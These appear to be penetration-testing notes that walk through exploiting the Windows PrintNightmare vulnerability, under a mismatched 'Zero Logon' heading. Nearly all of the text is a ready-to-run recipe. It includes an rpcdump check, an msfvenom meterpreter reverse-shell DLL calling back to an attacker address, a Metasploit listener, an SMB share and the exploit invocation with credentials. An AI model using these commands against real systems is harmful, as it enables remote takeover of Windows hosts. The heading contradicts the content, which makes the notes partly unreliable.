Zero Logon

Definition

PrintNightmare is a severe vulnerability affecting the Windows Print Spooler service. It allows attackers to execute arbitrary code remotely and potentially take control of affected systems.

Proof of concept

Remote Code Execution by cube0x0

https://github.com/cube0x0/CVE-2021-1675

We can first check if the target is vulnerable with rpcdump.py and the following command

rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
# Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
# Protocol: [MS-RPRN]: Print System Remote Protocol

Untitled

You’ll first need a malicious DLL, for this we can use msfvenom or compile one ourself like in this example 2 - Service DLL Hijacking.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.129 LPORT=5555 -f dll > shell.dll
msfconsole -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_tcp;set LHOST 10.0.0.129;set LPORT 5555;run;"

Then we can start a SMB server to get access to our payload

sudo env "PATH=$PATH" smbsever.py share `pwd` -smb2support

And finally run our exploit

python3 CVE-2021-1675.py orb.local/lkisaka:[email protected] '\\\\10.0.0.129\\share\\shell.dll'

And voila a reverse shell.

Local Privilege Escalation by calebstewart

https://github.com/calebstewart/CVE-2021-1675